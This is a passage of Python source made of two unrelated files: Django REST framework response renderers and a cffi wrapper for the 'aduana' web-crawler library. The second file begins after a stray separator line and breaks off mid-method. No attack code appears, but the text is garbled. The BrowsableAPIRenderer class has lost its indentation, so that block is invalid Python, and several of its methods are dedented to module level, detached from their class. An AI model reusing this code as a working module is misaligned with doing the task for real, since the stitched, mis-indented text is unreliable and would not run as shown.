    wrapping the json output in a callback function.
    """
    media_type = 'application/javascript'
    format = 'jsonp'
    callback_parameter = 'callback'
    default_callback = 'callback'
    charset = 'utf-8'

    def get_callback(self, renderer_context):
        """
        Determine the name of the callback to wrap around the json output.
        """
        request = renderer_context.get('request', None)
        if request:
            params = request.query_params or {}
        else:
            params = {}
        return params.get(self.callback_parameter, self.default_callback)

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """
        Renders into jsonp, wrapping the json output in a callback function.

        Clients may set the callback function name using a query parameter
        on the URL, for example: ?callback=exampleCallbackName
        """
        renderer_context = renderer_context or {}
        callback = self.get_callback(renderer_context)
        body = super(JSONPRenderer, self).render(data, accepted_media_type,
                                                 renderer_context)
        return b''.join([callback.encode(self.charset), b'(', body, b');'])
class XMLRenderer(BaseRenderer):
    """
    Renderer which serializes to XML.
    """
    media_type = 'application/xml'
    format = 'xml'
    charset = 'utf-8'

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """
        Renders `data` into serialized XML, wrapped in a single <root>
        element. `None` data renders as an empty string.
        """
        if data is None:
            return ''

        stream = StringIO()
        generator = SimplerXMLGenerator(stream, self.charset)
        generator.startDocument()
        generator.startElement("root", {})
        self._to_xml(generator, data)
        generator.endElement("root")
        generator.endDocument()
        return stream.getvalue()

    def _to_xml(self, xml, data):
        """Recursively emit `data` onto the XML generator.

        Lists become repeated <list-item> elements, dicts become child
        elements keyed by name, None emits nothing, and everything else is
        written as text content.
        """
        if data is None:
            # Don't output any value
            return
        if isinstance(data, (list, tuple)):
            for item in data:
                xml.startElement("list-item", {})
                self._to_xml(xml, item)
                xml.endElement("list-item")
        elif isinstance(data, dict):
            for key, value in six.iteritems(data):
                xml.startElement(key, {})
                self._to_xml(xml, value)
                xml.endElement(key)
        else:
            xml.characters(smart_text(data))
class YAMLRenderer(BaseRenderer):
    """
    Renderer which serializes to YAML.
    """
    media_type = 'application/yaml'
    format = 'yaml'
    encoder = encoders.SafeDumper
    charset = 'utf-8'
    ensure_ascii = False

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """
        Renders `data` into serialized YAML.

        `None` data renders as an empty string. Raises AssertionError if
        pyyaml is not installed (the `yaml` compat import is None then).
        """
        assert yaml, 'YAMLRenderer requires pyyaml to be installed'
        if data is None:
            return ''

        # allow_unicode mirrors ensure_ascii: unicode is emitted as-is
        # unless ASCII-only output was requested.
        return yaml.dump(data, stream=None, encoding=self.charset, Dumper=self.encoder, allow_unicode=not self.ensure_ascii)
class TemplateHTMLRenderer(BaseRenderer):
    """
    An HTML renderer for use with templates.

    The data supplied to the Response object should be a dictionary that will
    be used as context for the template.

    The template name is determined by (in order of preference):

    1. An explicit `.template_name` attribute set on the response.
    2. An explicit `.template_name` attribute set on this class.
    3. The return result of calling `view.get_template_names()`.

    For example:
        data = {'users': User.objects.all()}
        return Response(data, template_name='users.html')

    For pre-rendered HTML, see StaticHTMLRenderer.
    """
    media_type = 'text/html'
    format = 'html'
    template_name = None
    # Candidate templates for exception responses; '%(status_code)s' is
    # filled in from the response (e.g. '404.html').
    exception_template_names = [
        '%(status_code)s.html',
        'api_exception.html'
    ]
    charset = 'utf-8'

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """
        Renders data to HTML, using Django's standard template rendering.

        The template name is determined by (in order of preference):

        1. An explicit .template_name set on the response.
        2. An explicit .template_name set on this class.
        3. The return result of calling view.get_template_names().
        """
        renderer_context = renderer_context or {}
        view = renderer_context['view']
        request = renderer_context['request']
        response = renderer_context['response']

        if response.exception:
            template = self.get_exception_template(response)
        else:
            template_names = self.get_template_names(response, view)
            template = self.resolve_template(template_names)

        context = self.resolve_context(data, request, response)
        return template.render(context)

    def resolve_template(self, template_names):
        """Select the first existing template from `template_names`."""
        return loader.select_template(template_names)

    def resolve_context(self, data, request, response):
        """Build the template context; exposes `status_code` on errors.

        NOTE(review): mutates `data` in place when the response is an
        exception.
        """
        if response.exception:
            data['status_code'] = response.status_code
        return RequestContext(request, data)

    def get_template_names(self, response, view):
        """Return candidate template names per the precedence documented on
        the class; raises ImproperlyConfigured if none is available."""
        if response.template_name:
            return [response.template_name]
        elif self.template_name:
            return [self.template_name]
        elif hasattr(view, 'get_template_names'):
            return view.get_template_names()
        elif hasattr(view, 'template_name'):
            return [view.template_name]
        raise ImproperlyConfigured(
            'Returned a template response with no `template_name` attribute set on either the view or response'
        )

    def get_exception_template(self, response):
        """Return a template for an exception response, falling back to a
        minimal inline template like '404 Not Found'."""
        template_names = [name % {'status_code': response.status_code}
                          for name in self.exception_template_names]

        try:
            # Try to find an appropriate error template
            return self.resolve_template(template_names)
        except Exception:
            # Fall back to using eg '404 Not Found'
            return Template('%d %s' % (response.status_code,
                                       response.status_text.title()))
# Note, subclass TemplateHTMLRenderer simply for the exception behavior
class StaticHTMLRenderer(TemplateHTMLRenderer):
    """
    An HTML renderer class that simply returns pre-rendered HTML.

    The data supplied to the Response object should be a string representing
    the pre-rendered HTML content.

    For example:
        data = '<html><body>example</body></html>'
        return Response(data)

    For template rendered HTML, see TemplateHTMLRenderer.
    """
    media_type = 'text/html'
    format = 'html'
    charset = 'utf-8'

    def render(self, data, accepted_media_type=None, renderer_context=None):
        # Pass pre-rendered content straight through; only exceptions go
        # through the inherited error-template machinery.
        renderer_context = renderer_context or {}
        response = renderer_context['response']

        if not (response and response.exception):
            return data

        request = renderer_context['request']
        template = self.get_exception_template(response)
        context = self.resolve_context(data, request, response)
        return template.render(context)
class HTMLFormRenderer(BaseRenderer):
    """
    Renders serializer data into an HTML form.

    If the serializer was instantiated without an object then this will
    return an HTML form not bound to any object,
    otherwise it will return an HTML form with the appropriate initial data
    populated from the object.

    Note that rendering of field and form errors is not currently supported.
    """
    media_type = 'text/html'
    format = 'form'
    charset = 'utf-8'
    template_pack = 'rest_framework/horizontal/'
    base_template = 'form.html'

    # Maps serializer field classes to their default rendering style.
    # ClassLookupDict resolves via the field's class hierarchy, so
    # subclasses inherit the nearest ancestor's style.
    default_style = ClassLookupDict({
        serializers.Field: {
            'base_template': 'input.html',
            'input_type': 'text'
        },
        serializers.EmailField: {
            'base_template': 'input.html',
            'input_type': 'email'
        },
        serializers.URLField: {
            'base_template': 'input.html',
            'input_type': 'url'
        },
        serializers.IntegerField: {
            'base_template': 'input.html',
            'input_type': 'number'
        },
        serializers.DateTimeField: {
            'base_template': 'input.html',
            'input_type': 'datetime-local'
        },
        serializers.DateField: {
            'base_template': 'input.html',
            'input_type': 'date'
        },
        serializers.TimeField: {
            'base_template': 'input.html',
            'input_type': 'time'
        },
        serializers.FileField: {
            'base_template': 'input.html',
            'input_type': 'file'
        },
        serializers.BooleanField: {
            'base_template': 'checkbox.html'
        },
        serializers.ChoiceField: {
            'base_template': 'select.html',  # Also valid: 'radio.html'
        },
        serializers.MultipleChoiceField: {
            'base_template': 'select_multiple.html',  # Also valid: 'checkbox_multiple.html'
        },
        serializers.RelatedField: {
            'base_template': 'select.html',  # Also valid: 'radio.html'
        },
        serializers.ManyRelatedField: {
            'base_template': 'select_multiple.html',  # Also valid: 'checkbox_multiple.html'
        },
        serializers.Serializer: {
            'base_template': 'fieldset.html'
        },
        serializers.ListSerializer: {
            'base_template': 'list_fieldset.html'
        }
    })

    def render_field(self, field, parent_style):
        """Render a single bound serializer field to an HTML string.

        The field's own `style` overrides the class default; hidden fields
        render as the empty string.
        """
        if isinstance(field, serializers.HiddenField):
            return ''

        style = dict(self.default_style[field])
        style.update(field.style)
        if 'template_pack' not in style:
            style['template_pack'] = parent_style.get('template_pack', self.template_pack)
        style['renderer'] = self

        # presumably the trailing 'Z' is stripped because datetime-local
        # inputs reject it -- TODO confirm against browser behavior
        if style.get('input_type') == 'datetime-local' and isinstance(field.value, six.text_type):
            field.value = field.value.rstrip('Z')

        if 'template' in style:
            template_name = style['template']
        else:
            template_name = style['template_pack'].strip('/') + '/' + style['base_template']

        template = loader.get_template(template_name)
        context = Context({'field': field, 'style': style})
        return template.render(context)

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """
        Render serializer data and return an HTML form, as a string.
        """
        # Bug fix: normalize renderer_context *before* it is used. The check
        # `'template' in renderer_context` previously ran on the raw argument
        # and raised TypeError when the default `None` was passed.
        renderer_context = renderer_context or {}

        form = data.serializer

        meta = getattr(form, 'Meta', None)
        style = getattr(meta, 'style', {})
        if 'template_pack' not in style:
            style['template_pack'] = self.template_pack
        if 'base_template' not in style:
            style['base_template'] = self.base_template
        style['renderer'] = self

        # This API needs to be finessed and finalized for 3.1
        if 'template' in renderer_context:
            template_name = renderer_context['template']
        elif 'template' in style:
            template_name = style['template']
        else:
            template_name = style['template_pack'].strip('/') + '/' + style['base_template']

        request = renderer_context['request']
        template = loader.get_template(template_name)
        context = RequestContext(request, {
            'form': form,
            'style': style
        })
        return template.render(context)
class BrowsableAPIRenderer(BaseRenderer):
"""
HTML renderer used to self-document the API.
"""
media_type = 'text/html'
format = 'api'
template = 'rest_framework/api.html'
charset = 'utf-8'
form_renderer_class = HTMLFormRenderer
def get_default_renderer(self, view):
"""
Return an instance of the first valid renderer.
(Don't use another documenting renderer.)
"""
renderers = [renderer for renderer in view.renderer_classes
if not issubclass(renderer, BrowsableAPIRenderer)]
non_template_renderers = [renderer for renderer in renderers
if not hasattr(renderer, 'get_template_names')]
if not renderers:
return None
elif non_template_renderers:
return non_template_renderers[0]()
return renderers[0]()
def get_content(self, renderer, data,
accepted_media_type, renderer_context):
"""
Get the content as if it had been rendered by the default
non-documenting renderer.
"""
if not renderer:
return '[No renderers were found]'
renderer_context['indent'] = 4
content = renderer.render(data, accepted_media_type, renderer_context)
render_style = getattr(renderer, 'render_style', 'text')
assert render_style in ['text', 'binary'], 'Expected .render_style ' \
'"text" or "binary", but got "%s"' % render_style
if render_style == 'binary':
return '[%d bytes of binary content]' % len(content)
return content
def show_form_for_method(self, view, method, request, obj):
"""
Returns True if a form should be shown for this method.
"""
if method not in view.allowed_methods:
return # Not a valid method
if not api_settings.FORM_METHOD_OVERRIDE:
return # Cannot use form overloading
try:
view.check_permissions(request)
if obj is not None:
view.check_object_permissions(request, obj)
except exceptions.APIException:
return False # Doesn't have permissions
return True
def get_rendered_html_form(self, data, view, method, request):
"""
Return a string representing a rendered HTML form, possibly bound to
either the input or output data.
In the absence of the View having an associated form then return None.
"""
# See issue #2089 for refactoring this.
serializer = getattr(data, 'serializer', None)
if serializer and not getattr(serializer, 'many', False):
instance = getattr(serializer, 'instance', None)
if isinstance(instance, Page):
instance = None
else:
instance = None
# If this is valid serializer data, and the form is for the same
# HTTP method as was used in the request then use the existing
# serializer instance, rather than dynamically creating a new one.
if request.method == method and serializer is not None:
try:
kwargs = {'data': request.data}
except ParseError:
kwargs = {}
existing_serializer = serializer
else:
kwargs = {}
existing_serializer = None
with override_method(view, request, method) as request:
if not self.show_form_for_method(view, method, request, instance):
return
if method in ('DELETE', 'OPTIONS'):
return True # Don't actually need to return a form
if (
not getattr(view, 'get_serializer', None)
or not any(is_form_media_type(parser.media_type) for parser in view.parser_classes)
):
return
if existing_serializer is not None:
serializer = existing_serializer
else:
if method in ('PUT', 'PATCH'):
serializer = view.get_serializer(instance=instance, **kwargs)
else:
serializer = view.get_serializer(**kwargs)
if hasattr(serializer, 'initial_data'):
serializer.is_valid()
form_renderer = self.form_renderer_class()
return form_renderer.render(
serializer.data,
self.accepted_media_type,
dict(
list(self.renderer_context.items()) +
[('template', 'rest_framework/api_form.html')]
)
)
def get_raw_data_form(self, data, view, method, request):
    """
    Returns a form that allows for arbitrary content types to be tunneled
    via standard HTML forms.
    (Which are typically application/x-www-form-urlencoded)
    """
    # See issue #2089 for refactoring this.
    serializer = getattr(data, 'serializer', None)
    if serializer and not getattr(serializer, 'many', False):
        instance = getattr(serializer, 'instance', None)
        # Paginated responses carry a Page here, which is not an instance.
        if isinstance(instance, Page):
            instance = None
    else:
        instance = None
    with override_method(view, request, method) as request:
        # If we're not using content overloading there's no point in
        # supplying a generic form, as the view won't treat the form's
        # value as the content of the request.
        if not (api_settings.FORM_CONTENT_OVERRIDE
                and api_settings.FORM_CONTENTTYPE_OVERRIDE):
            return None
        # Check permissions
        if not self.show_form_for_method(view, method, request, instance):
            return
        # If possible, serialize the initial content for the generic form
        default_parser = view.parser_classes[0]
        renderer_class = getattr(default_parser, 'renderer_class', None)
        if (hasattr(view, 'get_serializer') and renderer_class):
            # View has a serializer defined and parser class has a
            # corresponding renderer that can be used to render the data.
            if method in ('PUT', 'PATCH'):
                serializer = view.get_serializer(instance=instance)
            else:
                serializer = view.get_serializer()
            # Render the raw data content
            renderer = renderer_class()
            accepted = self.accepted_media_type
            context = self.renderer_context.copy()
            context['indent'] = 4
            content = renderer.render(serializer.data, accepted, context)
        else:
            content = None
        # Generate a generic form that includes a content type field,
        # and a content field.
        content_type_field = api_settings.FORM_CONTENTTYPE_OVERRIDE
        content_field = api_settings.FORM_CONTENT_OVERRIDE
        media_types = [parser.media_type for parser in view.parser_classes]
        choices = [(media_type, media_type) for media_type in media_types]
        initial = media_types[0]
        # NB. http://jacobian.org/writing/dynamic-form-generation/
        class GenericContentForm(forms.Form):
            def __init__(self):
                super(GenericContentForm, self).__init__()
                self.fields[content_type_field] = forms.ChoiceField(
                    label='Media type',
                    choices=choices,
                    initial=initial
                )
                self.fields[content_field] = forms.CharField(
                    label='Content',
                    widget=forms.Textarea,
                    initial=content
                )
        return GenericContentForm()
def get_name(self, view):
    """Return the display name for the given API view."""
    view_name = view.get_view_name()
    return view_name
def get_description(self, view):
    """Return the (HTML-rendered) description for the given API view."""
    description = view.get_view_description(html=True)
    return description
def get_breadcrumbs(self, request):
    """Return the breadcrumb list for the current request path."""
    current_path = request.path
    return get_breadcrumbs(current_path)
def get_context(self, data, accepted_media_type, renderer_context):
    """
    Returns the context used to render.

    Builds rendered HTML forms and raw-data forms for each HTTP method,
    plus the headers/metadata shown in the browsable API template.
    """
    view = renderer_context['view']
    request = renderer_context['request']
    response = renderer_context['response']
    renderer = self.get_default_renderer(view)
    # Generic "raw data" forms for the write methods.
    raw_data_post_form = self.get_raw_data_form(data, view, 'POST', request)
    raw_data_put_form = self.get_raw_data_form(data, view, 'PUT', request)
    raw_data_patch_form = self.get_raw_data_form(data, view, 'PATCH', request)
    raw_data_put_or_patch_form = raw_data_put_form or raw_data_patch_form
    response_headers = dict(response.items())
    renderer_content_type = ''
    if renderer:
        renderer_content_type = '%s' % renderer.media_type
        if renderer.charset:
            renderer_content_type += ' ;%s' % renderer.charset
    # Show the Content-Type the nested renderer would actually produce.
    response_headers['Content-Type'] = renderer_content_type
    context = {
        'content': self.get_content(renderer, data, accepted_media_type, renderer_context),
        'view': view,
        'request': request,
        'response': response,
        'description': self.get_description(view),
        'name': self.get_name(view),
        'version': VERSION,
        'breadcrumblist': self.get_breadcrumbs(request),
        'allowed_methods': view.allowed_methods,
        'available_formats': [renderer_cls.format for renderer_cls in view.renderer_classes],
        'response_headers': response_headers,
        'put_form': self.get_rendered_html_form(data, view, 'PUT', request),
        'post_form': self.get_rendered_html_form(data, view, 'POST', request),
        'delete_form': self.get_rendered_html_form(data, view, 'DELETE', request),
        'options_form': self.get_rendered_html_form(data, view, 'OPTIONS', request),
        'raw_data_put_form': raw_data_put_form,
        'raw_data_post_form': raw_data_post_form,
        'raw_data_patch_form': raw_data_patch_form,
        'raw_data_put_or_patch_form': raw_data_put_or_patch_form,
        # Hide the edit forms when the request was denied (HTTP 403).
        'display_edit_forms': bool(response.status_code != 403),
        'api_settings': api_settings
    }
    return context
def render(self, data, accepted_media_type=None, renderer_context=None):
    """
    Render the HTML for the browsable API representation.
    """
    # Stash these on self so helper methods (get_rendered_html_form,
    # get_raw_data_form, ...) can read them without extra parameters.
    self.accepted_media_type = accepted_media_type or ''
    self.renderer_context = renderer_context or {}
    template = loader.get_template(self.template)
    context = self.get_context(data, accepted_media_type, renderer_context)
    context = RequestContext(renderer_context['request'], context)
    ret = template.render(context)
    # Munge DELETE Response code to allow us to return content
    # (Do this *after* we've rendered the template so that we include
    # the normal deletion response code in the output)
    response = renderer_context['response']
    if response.status_code == status.HTTP_204_NO_CONTENT:
        response.status_code = status.HTTP_200_OK
    return ret
class MultiPartRenderer(BaseRenderer):
    """Renderer that encodes data as multipart/form-data with a fixed,
    well-known boundary string (presumably for test-client use — the
    boundary is baked into the media type)."""
    media_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
    format = 'multipart'
    charset = 'utf-8'
    # Older Django (< 1.5) expects a bytestring boundary.
    BOUNDARY = 'BoUnDaRyStRiNg' if django.VERSION >= (1, 5) else b'BoUnDaRyStRiNg'

    def render(self, data, accepted_media_type=None, renderer_context=None):
        # Delegate the actual encoding to Django's encode_multipart helper.
        return encode_multipart(self.BOUNDARY, data)
| |
import warnings
import re
from _aduana import lib as C_ADUANA
from _aduana import ffi
########################################################################
# PageDB Wrappers
########################################################################
class PageDBException(Exception):
    """Raised when a call into the aduana C library reports an error."""

    @classmethod
    def from_error(cls, c_error):
        # Build an exception straight from a C-side error structure.
        return cls(
            message=C_ADUANA.error_message(c_error),
            code=C_ADUANA.error_code(c_error))

    def __init__(self, message, code=None):
        self.message = message
        self.code = code

    def __str__(self):
        text = ffi.string(self.message)
        if self.code:
            text += " (code={0})".format(self.code)
        return text
class CrawledPage(object):
    """Wrapper around the C ``CrawledPage`` structure: a crawled URL plus
    its outgoing links and an optional score / content hash."""

    def __init__(self, url, links=()):
        """Parameters:
        - url: a string
        - links: an iterable where each element can be:
              a. A link URL
              b. A pair made from a link URL and a score between 0 and 1
          If the first option is used then score is assumed 0.0

        Raises PageDBException if the C library rejects the page or a link.

        Note: the default for ``links`` was changed from the mutable ``[]``
        to the immutable ``()`` — identical behavior, but avoids the shared
        mutable-default-argument pitfall.
        """
        # make sure we keep a reference to the module
        self._c_aduana = C_ADUANA
        self._crawled_page = self._c_aduana.crawled_page_new(url)
        if not self._crawled_page:
            raise PageDBException(
                "Error inside crawled_page_new: returned NULL")
        for pair in links:
            # Renamed from `url` to avoid shadowing the page URL parameter.
            if isinstance(pair, basestring):
                link_url = pair
                score = 0.0
            else:
                link_url = pair[0]
                score = pair[1]
            ret = self._c_aduana.crawled_page_add_link(
                self._crawled_page,
                link_url,
                ffi.cast("float", score))
            if ret != 0:
                raise PageDBException(
                    "Error inside crawled_page_add_link: returned %d" % ret)

    @property
    def score(self):
        return self._crawled_page.score

    @score.setter
    def score(self, value):
        self._crawled_page.score = value

    @property
    def hash(self):
        """64-bit content hash, or None if the C side has no hash set."""
        ret = None
        phash = ffi.cast('uint64_t *', self._crawled_page.content_hash)
        if phash:
            ret = phash[0]
        return ret

    @hash.setter
    def hash(self, value):
        ret = self._c_aduana.crawled_page_set_hash64(
            self._crawled_page, ffi.cast('uint64_t', value))
        if ret != 0:
            raise PageDBException(
                "Error inside crawled_page_set_hash64: returned %d" % ret)

    def get_links(self):
        """Return the page's links as a list of (url, score) pairs."""
        links = []
        for i in xrange(self._c_aduana.crawled_page_n_links(self._crawled_page)):
            pLi = self._c_aduana.crawled_page_get_link(self._crawled_page, i)
            links.append((pLi[0].url, pLi[0].score))
        return links

    def __del__(self):
        # Free the underlying C structure.
        self._c_aduana.crawled_page_delete(self._crawled_page)
class PageInfo(object):
    """Read-only wrapper around a C ``PageInfo`` structure.

    Attribute lookups not defined here fall through to the underlying
    C struct via ``__getattr__``.
    """

    def __init__(self, page_hash, c_page_info):
        # Keep a reference to the C module so it is still reachable in __del__.
        self._c_aduana = C_ADUANA
        self._page_info = c_page_info
        self._hash = page_hash

    @property
    def url(self):
        # Convert the C char* to a Python string.
        return ffi.string(self._page_info.url)

    def __getattr__(self, name):
        # Delegate unknown attributes to the C struct fields.
        return getattr(self._page_info, name)

    def __del__(self):
        self._c_aduana.page_info_delete(self._page_info)

    def __hash__(self):
        # Pages hash to their page-db 64-bit hash (see PageDB.urlhash),
        # so hash(page_info) can be used as a stable page key.
        return self._hash

    @property
    def rate(self):
        # Crawl rate as computed by the C library.
        return self._c_aduana.page_info_rate(self._page_info)

    @property
    def is_seed(self):
        return self._c_aduana.page_info_is_seed(self._page_info)
class PageDB(object):
    """Wrapper around the C ``PageDB`` database of crawled pages."""

    @staticmethod
    def urlhash(url):
        # 64-bit hash the C library assigns to a URL.
        return C_ADUANA.page_db_hash(url)

    def __init__(self, path, persist=0):
        # save to make sure lib is available at destruction time
        self._c_aduana = C_ADUANA
        self._page_db = ffi.new('PageDB **')
        ret = self._c_aduana.page_db_new(self._page_db, path)
        if ret != 0:
            if self._page_db:
                raise PageDBException.from_error(self._page_db[0].error)
            else:
                raise PageDBException("Error inside page_db_new", ret)
        self.persist = persist

    @property
    def persist(self):
        # NOTE(review): presumably controls whether the on-disk files
        # survive page_db_delete — confirm against the C library docs.
        return self._page_db[0].persist

    @persist.setter
    def persist(self, value):
        self._c_aduana.page_db_set_persist(self._page_db[0], value)

    def __del__(self):
        self._c_aduana.page_db_delete(self._page_db[0])

    def iter_page_info(self):
        """Generator over a PageInfo for every page in the database."""
        st = ffi.new('HashInfoStream **')
        ret = self._c_aduana.hashinfo_stream_new(st, self._page_db[0])
        if ret != 0:
            raise PageDBException.from_error(self._page_db[0].error)
        page_hash = ffi.new('uint64_t *')
        pi = ffi.new('PageInfo **')
        while True:
            ss = self._c_aduana.hashinfo_stream_next(st[0], page_hash, pi)
            if ss != self._c_aduana.stream_state_next:
                break
            yield PageInfo(page_hash[0], pi[0])
        self._c_aduana.hashinfo_stream_delete(st[0])

    def page_info(self, page_hash):
        """Look up a single page by its 64-bit hash; raises on error."""
        pi = ffi.new('PageInfo **')
        ret = self._c_aduana.page_db_get_info(
            self._page_db[0], ffi.cast('uint64_t', page_hash), pi)
        if ret != 0:
            raise PageDBException.from_error(self._page_db[0].error)
        return PageInfo(page_hash, pi[0])
########################################################################
# Scorers
########################################################################
class PageRankScorer(object):
    """Wrapper around the C PageRank scorer attached to a PageDB."""

    def __init__(self, page_db):
        # Keep a reference to the C module for use at destruction time.
        self._c_aduana = C_ADUANA
        self._scorer = ffi.new('PageRankScorer **')
        self._c_aduana.page_rank_scorer_new(self._scorer, page_db._page_db[0])

    def __del__(self):
        self._c_aduana.page_rank_scorer_delete(self._scorer[0])

    def setup(self, scorer):
        # Attach this scorer to a scheduler's C-side scorer slot
        # (called by BFScheduler.__init__).
        self._c_aduana.page_rank_scorer_setup(self._scorer[0], scorer)

    @property
    def persist(self):
        return self._scorer[0].persist

    @persist.setter
    def persist(self, value):
        self._c_aduana.page_rank_scorer_set_persist(self._scorer[0], value)

    @property
    def use_content_scores(self):
        return self._scorer[0].use_content_scores

    @use_content_scores.setter
    def use_content_scores(self, value):
        # C side expects an integer flag, so coerce truthiness to 0/1.
        self._c_aduana.page_rank_scorer_set_use_content_scores(
            self._scorer[0], 1 if value else 0)

    @property
    def damping(self):
        # PageRank damping factor.
        return self._scorer[0].page_rank.damping

    @damping.setter
    def damping(self, value):
        self._c_aduana.page_rank_scorer_set_damping(self._scorer[0], value)
class HitsScorer(object):
    """Wrapper around the C HITS scorer attached to a PageDB."""

    def __init__(self, page_db):
        # Keep a reference to the C module for use at destruction time.
        self._c_aduana = C_ADUANA
        self._scorer = ffi.new('HitsScorer **')
        self._c_aduana.hits_scorer_new(self._scorer, page_db._page_db[0])

    def __del__(self):
        self._c_aduana.hits_scorer_delete(self._scorer[0])

    def setup(self, scorer):
        # Attach this scorer to a scheduler's C-side scorer slot.
        self._c_aduana.hits_scorer_setup(self._scorer[0], scorer)

    @property
    def persist(self):
        return self._scorer[0].persist

    @persist.setter
    def persist(self, value):
        self._c_aduana.hits_scorer_set_persist(self._scorer[0], value)

    @property
    def use_content_scores(self):
        return self._scorer[0].use_content_scores

    @use_content_scores.setter
    def use_content_scores(self, value):
        # C side expects an integer flag, so coerce truthiness to 0/1.
        self._c_aduana.hits_scorer_set_use_content_scores(
            self._scorer[0], 1 if value else 0)
########################################################################
# Scheduler Wrappers
########################################################################
class SchedulerCore(object):
    """Shared add/request plumbing used by both scheduler wrappers.

    Holds the C scheduler handle plus the scheduler-specific C add and
    request functions, so BFScheduler and FreqScheduler can delegate to
    a single implementation.
    """

    def __init__(self, scheduler, scheduler_add, scheduler_request):
        self._c_aduana = C_ADUANA
        self._sch = scheduler
        self._scheduler_add = scheduler_add
        self._scheduler_request = scheduler_request

    def add(self, crawled_page):
        # better to signal this as an error here than in bf_scheduler_add
        if not isinstance(crawled_page, CrawledPage):
            raise PageDBException("argument to function must be a CrawledPage instance")
        ret = self._scheduler_add(self._sch[0], crawled_page._crawled_page)
        if ret != 0:
            raise PageDBException.from_error(self._sch[0].error)

    def requests(self, n_pages):
        """Ask the C scheduler for up to n_pages URLs to crawl next."""
        pReq = ffi.new('PageRequest **')
        ret = self._scheduler_request(self._sch[0], n_pages, pReq)
        if ret != 0:
            raise PageDBException.from_error(self._sch[0].error)
        # Copy URLs out before freeing the C-side request structure.
        reqs = [ffi.string(pReq[0].urls[i]) for i in xrange(pReq[0].n_urls)]
        self._c_aduana.page_request_delete(pReq[0])
        return reqs
class BFScheduler(object):
    """Best-first scheduler wrapper around the C ``BFScheduler``."""

    def __init__(self, page_db, persist=0, scorer=None, path=None):
        """Parameters:
        - page_db: a PageDB instance
        - persist: forwarded to both the page DB and the scheduler
        - scorer:  optional scorer (e.g. PageRankScorer/HitsScorer)
        - path:    optional on-disk path for the scheduler database
        """
        # save to make sure lib is available at destruction time
        self._c_aduana = C_ADUANA
        self._page_db = page_db
        self._page_db.persist = persist
        self._sch = ffi.new('BFScheduler **')
        # Shared add/request plumbing bound to the bf_scheduler C calls.
        self._core = SchedulerCore(
            self._sch,
            self._c_aduana.bf_scheduler_add,
            self._c_aduana.bf_scheduler_request
        )
        ret = self._c_aduana.bf_scheduler_new(
            self._sch,
            self._page_db._page_db[0],
            path or ffi.NULL
        )
        if ret != 0:
            if self._sch:
                raise PageDBException.from_error(self._sch[0].error)
            else:
                raise PageDBException("Error inside bf_scheduler_new", ret)
        self._c_aduana.bf_scheduler_set_persist(self._sch[0], persist)
        if scorer:
            self._scorer = scorer
            self._scorer.setup(self._sch[0].scorer)
        ret = self._c_aduana.bf_scheduler_update_start(self._sch[0])
        if ret != 0:
            raise PageDBException.from_error(self._sch[0].error)

    def __del__(self):
        # Stop the background update before deleting the scheduler.
        ret = self._c_aduana.bf_scheduler_update_stop(self._sch[0])
        if ret != 0:
            raise PageDBException.from_error(self._sch[0].error)
        self._c_aduana.bf_scheduler_delete(self._sch[0])

    @classmethod
    def from_settings(cls, page_db, settings, logger=None):
        """Build a scheduler from a settings mapping.

        Recognized keys: SCORER, USE_SCORES, PAGE_RANK_DAMPING,
        SOFT_CRAWL_LIMIT, HARD_CRAWL_LIMIT, MAX_CRAWL_DEPTH,
        SCORE_UPDATE_INTERVAL.
        """
        # BUGFIX: default must be None, not False. With False, a missing
        # SCORER setting skipped the `is None` branch and then attempted
        # `False(page_db)`, raising TypeError.
        scorer_class = settings.get('SCORER', None)
        if scorer_class is None:
            if logger:
                logger.backend.warning(
                    'No SCORER setting. Using default content scorer')
            scorer = None
        else:
            scorer = scorer_class(page_db)
            use_scores = settings.get('USE_SCORES', False)
            if use_scores:
                if scorer_class == PageRankScorer:
                    scorer.damping = settings.get('PAGE_RANK_DAMPING', 0.85)
                scorer.use_content_scores = use_scores
        scheduler = cls(page_db, scorer=scorer, persist=page_db.persist)
        soft_crawl_limit = settings.get('SOFT_CRAWL_LIMIT', 0.25)
        hard_crawl_limit = settings.get('HARD_CRAWL_LIMIT', 100.0)
        scheduler.set_crawl_rate(soft_crawl_limit, hard_crawl_limit)
        max_crawl_depth = settings.get('MAX_CRAWL_DEPTH', None)
        if max_crawl_depth:
            scheduler.set_max_crawl_depth(max_crawl_depth)
        update_interval = settings.get('SCORE_UPDATE_INTERVAL', None)
        if update_interval:
            scheduler.set_update_interval(update_interval)
        return scheduler

    def add(self, crawled_page):
        return self._core.add(crawled_page)

    def requests(self, n_pages):
        return self._core.requests(n_pages)

    def set_crawl_rate(self, soft_rate, hard_rate):
        self._c_aduana.bf_scheduler_set_max_domain_crawl_rate(self._sch[0], soft_rate, hard_rate)

    def set_max_crawl_depth(self, max_crawl_depth=0):
        self._c_aduana.bf_scheduler_set_max_crawl_depth(self._sch[0], max_crawl_depth)

    def set_update_interval(self, update_interval):
        self._c_aduana.bf_scheduler_set_update_interval(self._sch[0], update_interval)
class FreqScheduler(object):
    """Scheduler wrapper that crawls pages according to per-page frequencies."""

    def __init__(self, page_db, persist=0, path=None):
        # save to make sure lib is available at destruction time
        self._c_aduana = C_ADUANA
        self._page_db = page_db
        self._page_db.persist = persist
        self._sch = ffi.new('FreqScheduler **')
        # Shared add/request plumbing bound to the freq_scheduler C calls.
        self._core = SchedulerCore(
            self._sch,
            self._c_aduana.freq_scheduler_add,
            self._c_aduana.freq_scheduler_request
        )
        ret = self._c_aduana.freq_scheduler_new(
            self._sch,
            self._page_db._page_db[0],
            path or ffi.NULL
        )
        if ret != 0:
            if self._sch:
                raise PageDBException.from_error(self._sch[0].error)
            else:
                raise PageDBException("Error inside freq_scheduler_new", ret)
        self._sch[0].persist = persist

    @classmethod
    def from_settings(cls, page_db, settings, logger=None):
        # Build from MAX_N_CRAWLS, FREQ_DEFAULT, FREQ_SCALE and FREQ_MARGIN.
        # `logger` is accepted for interface symmetry with
        # BFScheduler.from_settings but is unused here.
        scheduler = cls(page_db, persist=page_db.persist)
        max_n_crawls = settings.get('MAX_N_CRAWLS', None)
        if max_n_crawls:
            scheduler.max_n_crawls = max_n_crawls
        freq_default = settings.get('FREQ_DEFAULT', 0.1)
        freq_scale = settings.get('FREQ_SCALE', -1.0)
        scheduler.load_simple(freq_default, freq_scale)
